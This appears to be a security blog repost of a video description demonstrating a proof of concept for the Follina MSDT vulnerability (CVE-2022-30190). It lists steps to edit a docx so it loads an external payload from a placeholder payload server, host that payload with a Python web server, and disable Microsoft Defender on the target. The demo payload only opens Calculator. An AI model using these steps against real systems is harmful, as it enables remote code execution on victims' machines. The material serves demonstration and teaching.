Thorough MSDT 0-Day CVE-2022-30190 POC 'Follina'

Thorough POC MSDT 0-Day CVE-2022-30190 'Follina' In today's cyber episode: Thorough POC MSDT 0-Day CVE-2022-30190 'Follina' MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters). 0:00 ⏩ Intro 0:10 ⏩ Creating the DOCX file on Win10 2:51 ⏩ Creating the payload calling "Calc.exe" on Kali Linux 3:53 ⏩ Executing the malicious DOCX on a Win10 machine Proof of Concept Steps (PoC) ================================== 1. Open Word (used up-to-date 2019 Pro), create a dummy document, insert an (OLE) object as a Bitmap Image, save it as docx. 2. Open it with 7zip and navigate to to "word/_rels" and edit "document.xml.rels". Search "Type="https://ift.tt/MYibyJz" and change: Target="embeddings/oleObject1.bin" TO Target="http://*payload_server*/payload.html!" Add TargetMode = "External" 3. Navigate to "word/" and edit "document.xml". Search for "OLEObject" and change the attribute from Type="Embed" to Type="Link" and add the attribute UpdateMode="OnCall". *** ATTACKING MACHINE *** 4. Copy "exploit.html" and paste it on a text editor, saving it as "payload.html" 5. Type "python3 -m http.server" to host a local webserver 6. Check on the browser if the webserver is UP by typing its IP:PORT (payload.html should be there) *** WIN10 MACHINE *** 7. Disable MS Defender to run the PoC (MS Defender is detecting it) 8. Open the Doc1.docx Links & Sources ================================== https://ift.tt/w18aLgC https://ift.tt/OMxvYXc Stay tuned!
For more hacking info and tutorials visit: https://ift.tt/L0EywoZ
Hello and welcome to the temple of cybersecurity. Now you are watching Thorough MSDT 0-Day CVE-2022-30190 POC 'Follina' published at June 1, 2022 at 06:41PM. If you are looking for tutorials and all the news about the world of hacking and computer security, you have come to the right place. We invite you to subscribe to our newsletter in the box at the top and to follow us on our social networks:
NFT store: https://mintable.app/u/cha0smagick
Twitter: https://twitter.com/freakbizarro
Facebook: https://web.facebook.com/sectempleblogspotcom/
Discord: https://discord.gg/5SmaP39rdM



Ignore tags:
#hacking,#infosec,#tutorial,#bugbounty,#threat,#hunting,#pentest,#hacked,#ethical,#hacker,#cyber,#learn,#security,#computer,#pc,#news